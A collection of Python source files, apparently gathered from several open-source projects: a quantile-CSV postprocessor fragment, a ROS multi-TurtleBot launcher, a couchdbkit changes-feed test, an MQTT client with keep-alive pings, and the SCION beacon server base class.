del q_df[admin2_key]
if "adm2" in q_df.columns and level != "adm2":
del q_df["adm2"]
if "adm1" in q_df.columns and level != "adm1":
del q_df["adm1"]
if "adm0" in q_df.columns and level != "adm0":
del q_df["adm0"]
if verbose:
logging.info("\nQuantiles dataframe:")
logging.info(q_df.head())
# Push output df to write queue
write_queue.put((os.path.join(output_dir, level + "_quantiles.csv"), q_df))
pool = Pool(processes=args.nprocs)
for _ in tqdm.tqdm(
pool.imap_unordered(_process_date, dates),
total=len(dates),
desc="Postprocessing dates",
dynamic_ncols=True,
):
pass
pool.close()
pool.join() # wait until everything is done
to_write.join() # wait until queue is empty
to_write.put(None) # send signal to term loop
to_write.join() # wait until write_thread handles it
write_thread.join() # join the write_thread
# sort output csvs
if not args.no_sort:
for a_level in args.levels:
filename = os.path.join(output_dir, a_level + "_quantiles.csv")
logging.info("Sorting output file " + filename + "...")
out_df = pd.read_csv(filename)
# TODO we can avoid having to set index here once readable_column names is complete
# set index and sort them
out_df = out_df.set_index([a_level, "date", "quantile"]).sort_index()
# sort columns alphabetically
out_df = out_df.reindex(sorted(out_df.columns), axis=1)
# write out sorted csv
out_df = out_df.drop(columns="index") # TODO where did we pick this col up?
out_df.to_csv(filename, index=True)
logging.info("Done sort")
|
multi_process_agents.py
|
#!/usr/bin/env python
import multiprocessing
import rospy
from geometry_msgs.msg import Twist
from math import pow, atan2, sqrt
import numpy as np
from turtle_instance_laser_death_star import TurtleBot
'''
Description: This python file is responsible for creating multiple turtlebot instances
by using multiprocessing.
'''
k = 0
sp_x = [1,9,1,9]
sp_y = [1,9,9,1]
goal_x = [9,1,9,1]
goal_y = [9,1,1,9]
def multi_agents(agent_name,agent_obj,p_name):
'''
Description: Creates number of robots that user inputs.
'''
try:
agent_obj = TurtleBot(agent_name)
# agent_obj.start_point(sp_x,sp_y)
agent_obj.begin()
# agent_obj.move2goal_rvo(goal_x,goal_y)
except rospy.ROSInterruptException:
pass
user_input = int(input("Type no. of agents : "))
agent_names, agent_obj,p_name = [None] * (user_input), [None] * (user_input), [None] * (user_input)
#Equal distribution for start_point
#Temp fix for non-responding frist turtle
l=0
for j in range(user_input):
i=j+2
agent_names[j] = "robot_" + str(j)
agent_obj[j] = "x" + str(j)
for i in agent_names:
p_name[k] = "p"+str(k)
p_name[k] = multiprocessing.Process(target=multi_agents, args=(agent_names[k], agent_obj[k], p_name, ))
k += 1
for i in p_name:
i.start()
rospy.sleep(10)
|
test_changes.py
|
# -*- coding: utf-8 -
#
# This file is part of couchdbkit released under the MIT license.
# See the NOTICE for more information.
#
__author__ = 'benoitc@e-engura.com (Benoît Chesneau)'
import threading
import time
try:
import unittest2 as unittest
except ImportError:
import unittest
from couchdbkit import *
from couchdbkit.changes import ChangesStream, fold, foreach
class ClientServerTestCase(unittest.TestCase):
def setUp(self):
self.server = Server()
self._delete_db()
self.db = self.server.create_db("couchdbkit_test")
self.consumer = Consumer(self.db)
def tearDown(self):
self._delete_db()
def _delete_db(self):
try:
del self.server['couchdbkit_test']
except:
pass
def test_fetch(self):
# save a doc
doc = {}
self.db.save_doc(doc)
def fold_fun(c, acc):
acc.append(c)
return acc
changes = fold(self.db, fold_fun, [])
self.assertTrue(len(changes) == 1)
change = changes[0]
self.assertTrue(change["id"] == doc['_id'])
def test_lonpoll(self):
def test_change():
with ChangesStream(self.db, feed="longpoll") as stream:
for change in stream:
self.assertTrue(change["seq"] == 1)
t = threading.Thread(target=test_change)
t.daemon = True
t.start()
doc = {}
self.db.save_doc(doc)
def test_continuous(self):
lines = []
def test_change():
with ChangesStream(self.db, feed="continuous") as stream:
for change in stream:
lines.append(change)
t = threading.Thread(target=test_change)
t.daemon = True
t.start()
for i in range(5):
doc = {"_id": "test%s" % str(i)}
self.db.save_doc(doc)
self.db.ensure_full_commit()
time.sleep(0.3)
self.assertTrue(len(lines) == 5)
self.assertTrue(lines[4]["id"] == "test4")
doc = {"_id": "test5"}
self.db.save_doc(doc)
time.sleep(0.3)
self.assertTrue(len(lines) == 6)
self.assertTrue(lines[5]["id"] == "test5")
|
mqtt.py
|
# Copyright 2021 Nokia
# Licensed under the BSD 3-Clause Clear License.
# SPDX-License-Identifier: BSD-3-Clear
import paho.mqtt.client as mqtt
import a10.structures.identity
import a10.asvr.db.configuration
import threading
import time
def on_disconnect(client, userdata, rc):
logging.info("disconnecting reason " + str(rc))
client.connected_flag = False
client.disconnect_flag = True
def on_connect(client, metadata, flags, rc):
print("Connected mqtt: {}".format(rc))
def on_disconnect(client, metadata, flags, rc):
print("MQTT Disconnected")
try:
client.reconnect()
except:
print("Connection is fscked")
def publish(ch, t, op, data):
payload = str({"t": t, "op": op, "data": data})
mqttc.publish(ch, payload)
def sendKeepAlive():
print(
"Starting keepalive ping with rate ",
a10.asvr.db.configuration.MQTTKEEPALIVEPING,
)
while True:
print("ping!")
publish(
"AS/MQTTPING",
"ping",
"ping",
{"session": a10.asvr.db.configuration.ASSESSIONIDENTITY},
)
time.sleep(int(a10.asvr.db.configuration.MQTTKEEPALIVEPING))
print(a10.asvr.db.configuration.MQTTADDRESS)
#
# This is a bit nasty, but if two clients have the same name then the earlier one
# will be kicked off by the MQTT broker - at least in mosquitto
# So we will add the AS_Session_Identity and a UUID
#
id = (
a10.asvr.db.configuration.MQTTCLIENTNAME
+ "_"
+ a10.asvr.db.configuration.ASSESSIONIDENTITY
+ "_"
+ a10.structures.identity.generateID()
)
print("mqtt client id is ", id)
mqttc = mqtt.Client(id)
mqttc.on_connect = on_connect
mqttc.connect(a10.asvr.db.configuration.MQTTADDRESS, port=a10.asvr.db.configuration.MQTTPORT,
keepalive=int(a10.asvr.db.configuration.MQTTKEEPALIVEPING), bind_address="")
# KEEP ALIVE PING
if int(a10.asvr.db.configuration.MQTTKEEPALIVETHREAD==1):
print("Starting keep alive thead")
keepalivethread = threading.Thread(target=sendKeepAlive)
print("Keep alive thread ID is ", keepalivethread)
keepalivethread.start()
else:
print("Keep alive thread disabled")
|
base.py
|
# Copyright 2014 ETH Zurich
# Copyright 2018 ETH Zurich, Anapaya Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`base` --- Base beacon server
==================================
"""
# Stdlib
import logging
import os
import threading
import time
from collections import defaultdict
from abc import ABCMeta, abstractmethod
from threading import RLock
# External packages
from prometheus_client import Counter, Gauge
# SCION
from beacon_server.if_state import InterfaceState
from lib.crypto.asymcrypto import get_sig_key
from lib.crypto.symcrypto import kdf
from lib.crypto.util import (
get_master_key,
MASTER_KEY_0,
MASTER_KEY_1
)
from lib.defines import (
EXP_TIME_UNIT,
GEN_CACHE_PATH,
MIN_REVOCATION_TTL,
PATH_POLICY_FILE,
)
from lib.errors import (
SCIONKeyError,
SCIONParseError,
SCIONPathPolicyViolated,
SCIONServiceLookupError,
)
from lib.msg_meta import UDPMetadata
from lib.packet.cert_mgmt import CertChainRequest, CertMgmt
from lib.packet.ext.one_hop_path import OneHopPathExt
from lib.path_seg_meta import PathSegMeta
from lib.packet.ctrl_pld import CtrlPayload
from lib.packet.ifid import IFIDPayload
from lib.packet.opaque_field import HopOpaqueField, InfoOpaqueField
from lib.packet.path import SCIONPath
from lib.packet.path_mgmt.base import PathMgmt
from lib.packet.path_mgmt.ifstate import (
IFStateInfo,
IFStatePayload,
IFStateRequest,
)
from lib.packet.path_mgmt.rev_info import RevocationInfo, SignedRevInfo
from lib.packet.pcb import (
ASMarking,
PCB,
PCBMarking,
)
from lib.packet.proto_sign import ProtoSignType
from lib.packet.scion_addr import ISD_AS
from lib.packet.signed_util import DefaultSignSrc
from lib.packet.svc import SVCType
from lib.packet.scmp.types import SCMPClass, SCMPPathClass
from lib.path_store import PathPolicy
from lib.rev_cache import RevCache
from lib.thread import thread_safety_net
from lib.types import (
CertMgmtType,
PathMgmtType as PMT,
PayloadClass,
ServiceType,
)
from lib.util import (
SCIONTime,
sleep_interval,
)
from lib.zk.cache import ZkSharedCache
from lib.zk.errors import ZkNoConnection
from lib.zk.id import ZkID
from lib.zk.zk import ZK_LOCK_SUCCESS, Zookeeper
from scion_elem.scion_elem import SCIONElement
# Exported metrics.
BEACONS_PROPAGATED = Counter("bs_beacons_propagated_total", "# of propagated beacons",
["server_id", "isd_as", "type"])
SEGMENTS_REGISTERED = Counter("bs_segments_registered_total", "# of registered segments",
["server_id", "isd_as", "type"])
REVOCATIONS_ISSUED = Counter("bs_revocations_issued_total", "# of issued revocations",
["server_id", "isd_as"])
IS_MASTER = Gauge("bs_is_master", "true if this process is the replication master",
["server_id", "isd_as"])
IF_STATE = Gauge("bs_ifstate", "0/1/2 if interface is active/revoked/other",
["server_id", "isd_as", "ifid"])
class BeaconServer(SCIONElement, metaclass=ABCMeta):
"""
The SCION PathConstructionBeacon Server.
"""
SERVICE_TYPE = ServiceType.BS
# ZK path for incoming PCBs
ZK_PCB_CACHE_PATH = "pcb_cache"
# ZK path for revocations.
ZK_REVOCATIONS_PATH = "rev_cache"
# Time revocation objects are cached in memory (in seconds).
ZK_REV_OBJ_MAX_AGE = MIN_REVOCATION_TTL
# Revocation TTL
REVOCATION_TTL = MIN_REVOCATION_TTL
# Revocation Overlapping (seconds)
REVOCATION_OVERLAP = 2
# Interval to checked for timed out interfaces.
IF_TIMEOUT_INTERVAL = 1
# Interval to send keep-alive msgs
IFID_INTERVAL = 1
# Interval between two consecutive requests (in seconds).
CERT_REQ_RATE = 10
def __init__(self, server_id, conf_dir, spki_cache_dir=GEN_CACHE_PATH,
prom_export=None, sciond_path=None):
"""
:param str server_id: server identifier.
:param str conf_dir: configuration directory.
:param str prom_export: prometheus export address.
:param str sciond_path: path to sciond socket.
"""
super().__init__(server_id, conf_dir, spki_cache_dir=spki_cache_dir,
prom_export=prom_export, sciond_path=sciond_path)
self.config = self._load_as_conf()
self.master_key_0 = get_master_key(self.conf_dir, MASTER_KEY_0)
self.master_key_1 = get_master_key(self.conf_dir, MASTER_KEY_1)
# TODO: add 2 policies
self.path_policy = PathPolicy.from_file(
os.path.join(conf_dir, PATH_POLICY_FILE))
self.signing_key = get_sig_key(self.conf_dir)
self.of_gen_key = kdf(self.master_key_0, b"Derive OF Key")
# Amount of time units a HOF is valid (time unit is EXP_TIME_UNIT).
self.default_hof_exp_time = int(self.config.segment_ttl / EXP_TIME_UNIT) - 1
self.ifid_state = {}
for ifid in self.ifid2br:
self.ifid_state[ifid] = InterfaceState()
self.ifid_state_lock = RLock()
self.if_revocations = {}
self.CTRL_PLD_CLASS_MAP = {
PayloadClass.PCB: {PayloadClass.PCB: self.handle_pcb},
PayloadClass.IFID: {PayloadClass.IFID: self.handle_ifid_packet},
PayloadClass.CERT: {
CertMgmtType.CERT_CHAIN_REQ: self.process_cert_chain_request,
CertMgmtType.CERT_CHAIN_REPLY: self.process_cert_chain_reply,
CertMgmtType.TRC_REPLY: self.process_trc_reply,
CertMgmtType.TRC_REQ: self.process_trc_request,
},
PayloadClass.PATH: {
PMT.IFSTATE_REQ: self._handle_ifstate_request,
PMT.REVOCATION: self._handle_revocation,
},
}
self.SCMP_PLD_CLASS_MAP = {
SCMPClass.PATH: {
SCMPPathClass.REVOKED_IF: self._handle_scmp_revocation,
},
}
zkid = ZkID.from_values(self.addr.isd_as, self.id,
[(self.addr.host, self._port)]).pack()
self.zk = Zookeeper(self.addr.isd_as, self.SERVICE_TYPE, zkid,
self.topology.zookeepers)
self.zk.retry("Joining party", self.zk.party_setup)
self.pcb_cache = ZkSharedCache(
self.zk, self.ZK_PCB_CACHE_PATH, self._handle_pcbs_from_zk)
self.revobjs_cache = ZkSharedCache(
self.zk, self.ZK_REVOCATIONS_PATH, self.process_rev_objects)
self.local_rev_cache = RevCache()
self._rev_seg_lock = RLock()
def propagate_downstream_pcb(self, pcb):
"""
Propagates the beacon to all children.
:param pcb: path segment.
:type pcb: PathSegment
"""
propagated_pcbs = defaultdict(list)
prop_cnt = 0
for intf in self.topology.child_interfaces:
if not intf.to_if_id:
continue
new_pcb, meta = self._mk_prop_pcb_meta(
pcb.copy(), intf.isd_as, intf.if_id)
if not new_pcb:
continue
self.send_meta(CtrlPayload(new_pcb.pcb()), meta)
propagated_pcbs[(intf.isd_as, intf.if_id)].append(pcb.short_id())
prop_cnt += 1
if self._labels:
BEACONS_PROPAGATED.labels(**self._labels, type="down").inc(prop_cnt)
return propagated_pcbs
def _mk_prop_pcb_meta(self, pcb, dst_ia, egress_if):
ts = pcb.get_timestamp()
asm = self._create_asm(pcb.ifID, egress_if, ts, pcb.last_hof())
if not asm:
return None, None
pcb.add_asm(asm, ProtoSignType.ED25519, self.addr.isd_as.pack())
pcb.sign(self.signing_key)
one_hop_path = self._create_one_hop_path(egress_if)
return pcb, self._build_meta(ia=dst_ia, host=SVCType.BS_A,
path=one_hop_path, one_hop=True)
def _create_one_hop_path(self, egress_if):
ts = int(SCIONTime.get_time())
info = InfoOpaqueField.from_values(ts, self.addr.isd_as[0], hops=2)
hf1 = HopOpaqueField.from_values(OneHopPathExt.HOF_EXP_TIME, 0, egress_if)
hf1.set_mac(self.of_gen_key, ts, None)
# Return a path where second HF is empty.
return SCIONPath.from_values(info, [hf1, HopOpaqueField()])
def hof_exp_time(self, ts):
"""
Return the ExpTime based on IF timestamp and the certificate chain/TRC.
The certificate chain must be valid for the entire HOF lifetime.
:param int ts: IF timestamp
:return: HF ExpTime
:rtype: int
"""
cert_exp = self._get_my_cert().as_cert.expiration_time
max_exp_time = int((cert_exp-ts) / EXP_TIME_UNIT) - 1
return min(max_exp_time, self.default_hof_exp_time)
def _mk_if_info(self, if_id):
"""
Small helper method to make it easier to deal with ingress/egress
interface being 0 while building ASMarkings.
"""
d = {"remote_ia": ISD_AS.from_values(0, 0), "remote_if": 0, "mtu": 0}
if not if_id:
return d
br = self.ifid2br[if_id]
d["remote_ia"] = br.interfaces[if_id].isd_as
d["remote_if"] = br.interfaces[if_id].to_if_id
d["mtu"] = br.interfaces[if_id].mtu
return d
@abstractmethod
def handle_pcbs_propagation(self):
"""
Main loop to propagate received beacons.
"""
raise NotImplementedError
def _log_propagations(self, propagated_pcbs):
for (isd_as, if_id), pcbs in propagated_pcbs.items():
logging.debug("Propagated %d PCBs to %s via %s (%s)", len(pcbs),
isd_as, if_id, ", ".join(pcbs))
def _handle_pcbs_from_zk(self, pcbs):
"""
Handles cached pcbs through ZK, passed as a list.
"""
for pcb in pcbs:
try:
pcb = PCB.from_raw(pcb)
except SCIONParseError as e:
logging.error("Unable to parse raw pcb: %s", e)
continue
self.handle_pcb(CtrlPayload(pcb))
if pcbs:
logging.debug("Processed %s PCBs from ZK", len(pcbs))
def handle_pcb(self, cpld, meta=None):
"""
Handles pcbs received from the network.
"""
pcb = cpld.union
assert isinstance(pcb, PCB), type(pcb)
pcb = pcb.pseg()
if meta:
pcb.ifID = meta.path.get_hof().ingress_if
try:
self.path_policy.check_filters(pcb)
except SCIONPathPolicyViolated as e:
logging.debug("Segment dropped due to path policy: %s\n%s" %
(e, pcb.short_desc()))
return
if not self._filter_pcb(pcb):
logging.debug("Segment dropped due to looping: %s" %
pcb.short_desc())
return
seg_meta = PathSegMeta(pcb, self.continue_seg_processing, meta)
self._process_path_seg(seg_meta, cpld.req_id)
def continue_seg_processing(self, seg_meta):
"""
For every verified pcb received from the network or ZK
this function gets called to continue the processing for the pcb.
"""
pseg = seg_meta.seg
logging.debug("Successfully verified PCB %s", pseg.short_id())
if seg_meta.meta:
# Segment was received from network, not from zk. Share segment
# with other beacon servers in this AS.
entry_name = "%s-%s" % (pseg.get_hops_hash(hex=True), time.time())
try:
self.pcb_cache.store(entry_name, pseg.pcb().copy().pack())
except ZkNoConnection:
logging.error("Unable to store PCB in shared cache: "
"no connection to ZK")
self.handle_ext(pseg)
self._handle_verified_beacon(pseg)
def _filter_pcb(self, pcb, dst_ia=None):
return True
def handle_ext(self, pcb):
"""
Handle beacon extensions.
"""
# Handle PCB extensions
for asm in pcb.iter_asms():
pol = asm.routing_pol_ext()
if pol:
self.handle_routing_pol_ext(pol)
def handle_routing_pol_ext(self, ext):
# TODO(Sezer): Implement routing policy extension handling
logging.debug("Routing policy extension: %s" % ext)
@abstractmethod
def register_segments(self):
"""
Registers paths according to the received beacons.
"""
raise NotImplementedError
def _log_registrations(self, registrations, seg_type):
reg_cnt = 0
for (dst_meta, dst_type), pcbs in registrations.items():
reg_cnt += len(pcbs)
logging.debug("Registered %d %s-segments @ %s:%s (%s)", len(pcbs),
seg_type, dst_type.upper(), dst_meta, ", ".join(pcbs))
if self._labels:
SEGMENTS_REGISTERED.labels(**self._labels, type=seg_type).inc(reg_cnt)
def _create_asm(self, in_if, out_if, ts, prev_hof):
pcbms = list(self._create_pcbms(in_if, out_if, ts, prev_hof))
if not pcbms:
return None
chain = self._get_my_cert()
_, cert_ver = chain.get_leaf_isd_as_ver()
return ASMarking.from_values(
self.addr.isd_as, self._get_my_trc().version, cert_ver, pcbms, self.topology.mtu)
def _create_pcbms(self, in_if, out_if, ts, prev_hof):
up_pcbm = self._create_pcbm(in_if, out_if, ts, prev_hof)
if not up_pcbm:
return
yield up_pcbm
for intf in sorted(self.topology.peer_interfaces):
in_if = intf.if_id
with self.ifid_state_lock:
if (not self.ifid_state[in_if].is_active() and
not self._quiet_startup()):
continue
peer_pcbm = self._create_pcbm(in_if, out_if, ts, up_pcbm.hof(), xover=True)
if peer_pcbm:
yield peer_pcbm
def _create_pcbm(self, in_if, out_if, ts, prev_hof, xover=False):
in_info = self._mk_if_info(in_if)
if in_info["remote_ia"].int() and not in_info["remote_if"]:
return None
out_info = self._mk_if_info(out_if)
if out_info["remote_ia"].int() and not out_info["remote_if"]:
return None
exp_time = self.hof_exp_time(ts)
if exp_time < 0:
logging.error("Invalid hop field expiration time value: %s", exp_time)
return None
hof = HopOpaqueField.from_values(exp_time, in_if, out_if, xover=xover)
hof.set_mac(self.of_gen_key, ts, prev_hof)
return PCBMarking.from_values(
in_info["remote_ia"], in_info["remote_if"], in_info["mtu"],
out_info["remote_ia"], out_info["remote_if"], hof)
def _terminate_pcb(self, pcb):
"""
Copies a PCB, terminates it and adds the segment ID.
Terminating a PCB means adding a opaque field with the egress IF set
to 0, i.e., there is no AS to forward a packet containing this path
segment to.
"""
pcb = pcb.copy()
asm = self._create_asm(pcb.ifID, 0, pcb.get_timestamp(),
pcb.last_hof())
if not asm:
return None
pcb.add_asm(asm, ProtoSignType.ED25519, self.addr.isd_as.pack())
return pcb
def handle_ifid_packet(self, cpld, meta):
"""
Update the interface state for the corresponding interface.
:param pld: The IFIDPayload.
:type pld: IFIDPayload
"""
pld = cpld.union
assert isinstance(pld, IFIDPayload), type(pld)
ifid = meta.pkt.path.get_hof().ingress_if
with self.ifid_state_lock:
if ifid not in self.ifid_state:
raise SCIONKeyError("Invalid IF %d in IFIDPayload" % ifid)
br = self.ifid2br[ifid]
br.interfaces[ifid].to_if_id = pld.p.origIF
prev_state = self.ifid_state[ifid].update()
if prev_state == InterfaceState.INACTIVE:
logging.info("IF %d activated.", ifid)
elif prev_state in [InterfaceState.TIMED_OUT,
InterfaceState.REVOKED]:
logging.info("IF %d came back up.", ifid)
if prev_state != InterfaceState.ACTIVE:
if self.zk.have_lock():
# Inform BRs about the interface coming up.
metas = []
for br in self.topology.border_routers:
br_addr, br_port = br.ctrl_addrs.public
metas.append(UDPMetadata.from_values(host=br_addr, port=br_port))
info = IFStateInfo.from_values(ifid, True)
self._send_ifstate_update([info], metas)
def run(self):
"""
Run an instance of the Beacon Server.
"""
threading.Thread(
target=thread_safety_net, args=(self.worker,),
name="BS.worker", daemon=True).start()
# https://github.com/scionproto/scion/issues/308:
threading.Thread(
target=thread_safety_net, args=(self._send_ifid_updates,),
name="BS._send_if_updates", daemon=True).start()
threading.Thread(
target=thread_safety_net, args=(self._handle_if_timeouts,),
name="BS._handle_if_timeouts", daemon=True).start()
threading.Thread(
target=thread_safety_net, args=(self._check_trc_cert_reqs,),
name="Elem.check_trc_cert_reqs", daemon=True).start()
threading.Thread(
target=thread_safety_net, args=(self._check_local_cert,),
name="BS._check_local_cert", daemon=True).start()
super().run()
def worker(self):
"""
Worker thread that takes care of reading shared PCBs from ZK, and
propagating PCBS/registering paths when master.
"""
last_propagation = last_registration = 0
worker_cycle = 1.0
start = time.time()
while self.run_flag.is_set():
sleep_interval(start, worker_cycle, "BS.worker cycle",
self._quiet_startup())
start = time.time()
# Update IS_MASTER metric.
if self._labels:
IS_MASTER.labels(**self._labels).set(int(self.zk.have_lock()))
try:
self.zk.wait_connected()
self.pcb_cache.process()
self.revobjs_cache.process()
self.handle_rev_objs()
ret = self.zk.get_lock(lock_timeout=0, conn_timeout=0)
if not ret: # Failed to get the lock
continue
elif ret == ZK_LOCK_SUCCESS:
logging.info("Became master")
self._became_master()
self.pcb_cache.expire(self.config.propagation_time * 10)
self.revobjs_cache.expire(self.ZK_REV_OBJ_MAX_AGE)
except ZkNoConnection:
continue
now = time.time()
if now - last_propagation >= self.config.propagation_time:
self.handle_pcbs_propagation()
last_propagation = now
if (self.config.registers_paths and
now - last_registration >= self.config.registration_time):
try:
self.register_segments()
except SCIONKeyError as e:
logging.error("Error while registering segments: %s", e)
pass
last_registration = now
def _became_master(self):
"""
Called when a BS becomes the new master. Resets some state that will be
rebuilt over time.
"""
# Reset all timed-out and revoked interfaces to inactive.
with self.ifid_state_lock:
for (_, ifstate) in self.ifid_state.items():
if not ifstate.is_active():
ifstate.reset()
def _get_my_trc(self):
return self.trust_store.get_trc(self.addr.isd_as[0])
def _get_my_cert(self):
return self.trust_store.get_cert(self.addr.isd_as)
@abstractmethod
def _handle_verified_beacon(self, pcb):
"""
Once a beacon has been verified, place it into the right containers.
:param pcb: verified path segment.
:type pcb: PathSegment
"""
raise NotImplementedError
def process_rev_objects(self, rev_infos):
"""
Processes revocation infos stored in Zookeeper.
"""
with self._rev_seg_lock:
for raw in rev_infos:
try:
srev_info = SignedRevInfo.from_raw(raw)
except SCIONParseError as e:
logging.error(
"Error parsing revocation info from ZK: %s", e)
continue
self.check_revocation(srev_info, lambda x: lambda:
self.local_rev_cache.add(srev_info) if not x else False)
def _issue_revocations(self, revoked_ifs):
"""
Store a RevocationInfo in ZK and send a revocation to all BRs.
:param list revoked_ifs: A list of interfaces that needs to be revoked.
"""
# Only the master BS issues revocations.
if not self.zk.have_lock():
return
# Process revoked interfaces.
infos = []
for if_id in revoked_ifs:
br = self.ifid2br[if_id]
rev_info = RevocationInfo.from_values(
self.addr.isd_as, if_id, br.interfaces[if_id].link_type,
int(time.time()), self.REVOCATION_TTL)
logging.info("Issuing revocation: %s", rev_info.short_desc())
if self._labels:
REVOCATIONS_ISSUED.labels(**self._labels).inc()
chain = self._get_my_cert()
_, cert_ver = chain.get_leaf_isd_as_ver()
src = DefaultSignSrc.from_values(rev_info.isd_as(), cert_ver,
self._get_my_trc().version).pack()
srev_info = SignedRevInfo.from_values(rev_info.copy().pack(),
ProtoSignType.ED25519, src)
srev_info.sign(self.signing_key)
# Add to revocation cache
self.if_revocations[if_id] = srev_info
self._process_revocation(srev_info)
infos.append(IFStateInfo.from_values(if_id, False, srev_info))
metas = []
# Add all BRs.
for br in self.topology.border_routers:
br_addr, br_port = br.ctrl_addrs.public
metas.append(UDPMetadata.from_values(host=br_addr, port=br_port))
# Add local path server.
if self.topology.path_servers:
try:
addr, port = self.dns_query_topo(ServiceType.PS)[0]
except SCIONServiceLookupError:
addr, port = None, None
# Create a meta if there is a local path service
if addr:
metas.append(UDPMetadata.from_values(host=addr, port=port))
self._send_ifstate_update(infos, metas)
def _handle_scmp_revocation(self, pld, meta):
srev_info = SignedRevInfo.from_raw(pld.info.srev_info)
self._handle_revocation(CtrlPayload(PathMgmt(srev_info)), meta)
def _handle_revocation(self, cpld, meta):
pmgt = cpld.union
srev_info = pmgt.union
rev_info = srev_info.rev_info()
assert isinstance(rev_info, RevocationInfo), type(rev_info)
logging.debug("Received revocation from %s: %s", meta, rev_info.short_desc())
self.check_revocation(srev_info, lambda x:
self._process_revocation(srev_info) if not x else False, meta)
def handle_rev_objs(self):
with self._rev_seg_lock:
for srev_info in self.local_rev_cache.values():
self._remove_revoked_pcbs(srev_info.rev_info())
def _process_revocation(self, srev_info):
"""
Removes PCBs containing a revoked interface and sends the revocation
to the local PS.
:param srev_info: The signed RevocationInfo object
:type srev_info: SignedRevInfo
"""
rev_info = srev_info.rev_info()
assert isinstance(rev_info, RevocationInfo), type(rev_info)
if_id = rev_info.p.ifID
if not if_id:
logging.error("Trying to revoke IF with ID 0.")
return
with self._rev_seg_lock:
self.local_rev_cache.add(srev_info.copy())
srev_info_packed = srev_info.copy().pack()
entry_name = "%s:%s" % (hash(srev_info_packed), time.time())
try:
self.revobjs_cache.store(entry_name, srev_info_packed)
except ZkNoConnection as exc:
logging.error("Unable to store revocation in shared cache "
"(no ZK connection): %s" % exc)
self._remove_revoked_pcbs(rev_info)
@abstractmethod
def _remove_revoked_pcbs(self, rev_info):
"""
Removes the PCBs containing the revoked interface.
:param rev_info: The RevocationInfo object.
:type rev_info: RevocationInfo
"""
raise NotImplementedError
def _pcb_list_to_remove(self, candidates, rev_info):
"""
Calculates the list of PCBs to remove.
Called by _remove_revoked_pcbs.
:param candidates: Candidate PCBs.
:type candidates: List
:param rev_info: The RevocationInfo object.
:type rev_info: RevocationInfo
"""
to_remove = []
if not rev_info.active():
return to_remove
processed = set()
for cand in candidates:
if cand.id in processed:
continue
processed.add(cand.id)
# If the interface on which we received the PCB is
# revoked, then the corresponding pcb needs to be removed.
if (self.addr.isd_as == rev_info.isd_as() and
cand.pcb.ifID == rev_info.p.ifID):
to_remove.append(cand.id)
for asm in cand.pcb.iter_asms():
if self._check_revocation_for_asm(rev_info, asm, False):
to_remove.append(cand.id)
return to_remove
def _handle_if_timeouts(self):
"""
Periodically checks each interface state and issues an IF revocation, if
no keep-alive message was received for IFID_TOUT.
"""
while self.run_flag.is_set():
start_time = time.time()
with self.ifid_state_lock:
to_revoke = []
for (ifid, if_state) in self.ifid_state.items():
if self._labels:
metric = IF_STATE.labels(ifid=ifid, **self._labels)
if if_state.is_active():
metric.set(0)
elif if_state.is_revoked():
metric.set(1)
else:
metric.set(2)
if not if_state.is_expired():
# Interface hasn't timed out
self.if_revocations.pop(ifid, None)
continue
srev_info = self.if_revocations.get(ifid, None)
if if_state.is_revoked() and srev_info:
# Interface is revoked until the revocation time plus the revocation TTL,
# we want to issue a new revocation REVOCATION_OVERLAP seconds
# before it is expired
rev_info = srev_info.rev_info()
if (rev_info.p.timestamp + rev_info.p.ttl -
self.REVOCATION_OVERLAP > start_time):
# Interface has already been revoked within the REVOCATION_TTL -
# REVOCATION_OVERLAP period
continue
if not if_state.is_revoked():
logging.info("IF %d went down.", ifid)
to_revoke.append(ifid)
if_state.revoke_if_expired()
if to_revoke:
self._issue_revocations(to_revoke)
sleep_interval(start_time, self.IF_TIMEOUT_INTERVAL, "Handle IF timeouts")
def _handle_ifstate_request(self, cpld, meta):
# Only master replies to ifstate requests.
pmgt = cpld.union
req = pmgt.union
assert isinstance(req, IFStateRequest), type(req)
if not self.zk.have_lock():
return
with self.ifid_state_lock:
infos = []
for (ifid, state) in self.ifid_state.items():
# Don't include inactive interfaces in update.
if state.is_inactive():
continue
srev_info = None
if state.is_revoked():
srev_info = self.if_revocations.get(ifid, None)
if not srev_info:
logging.warning("No revocation in cache for revoked IFID: %s", ifid)
continue
infos.append(IFStateInfo.from_values(ifid, state.is_active(), srev_info))
if not infos and not self._quiet_startup():
logging.warning("No IF state info to put in IFState update for %s.", meta)
return
self._send_ifstate_update(infos, [meta])
def _send_ifstate_update(self, state_infos, server_metas):
payload = CtrlPayload(PathMgmt(IFStatePayload.from_values(state_infos)))
for meta in server_metas:
logging.debug("IFState update to %s:%s", meta.host, meta.port)
self.send_meta(payload.copy(), meta)
def _send_ifid_updates(self):
start = time.time()
while self.run_flag.is_set():
sleep_interval(start, self.IFID_INTERVAL, "BS._send_ifid_updates cycle")
start = time.time()
# only master sends keep-alive messages
if not self.zk.have_lock():
continue
# send keep-alives on all known BR interfaces
for ifid in self.ifid2br:
br = self.ifid2br[ifid]
br_addr, br_port = br.int_addrs.public
one_hop_path = self._create_one_hop_path(ifid)
meta = self._build_meta(ia=br.interfaces[ifid].isd_as, host=SVCType.BS_M,
path=one_hop_path, one_hop=True)
self.send_meta(CtrlPayload(IFIDPayload.from_values(ifid)),
meta, (br_addr, br_port))
def _check_local_cert(self):
while self.run_flag.is_set():
chain = self._get_my_cert()
exp = min(chain.as_cert.expiration_time, chain.core_as_cert.expiration_time)
diff = exp - int(time.time())
if diff > self.config.segment_ttl:
time.sleep(diff - self.config.segment_ttl)
continue
cs_meta = self._get_cs()
req = CertChainRequest.from_values(
self.addr.isd_as, chain.as_cert.version+1, cache_only=True)
logging.info("Request new certificate chain. Req: %s", req)
self.send_meta(CtrlPayload(CertMgmt(req)), cs_meta)
cs_meta.close()
time.sleep(self.CERT_REQ_RATE)
def _init_metrics(self):
super()._init_metrics()
for type_ in ("core", "up", "down"):
BEACONS_PROPAGATED.labels(**self._labels, type=type_).inc(0)
SEGMENTS_REGISTERED.labels(**self._labels, type=type_).inc(0)
REVOCATIONS_ISSUED.labels(**self._labels).inc(0)
IS_MASTER.labels(**self._labels).set(0)
|
kernel.py
|
from queue import Queue
from threading import Thread
from ipykernel.kernelbase import Kernel
import re
import subprocess
import tempfile
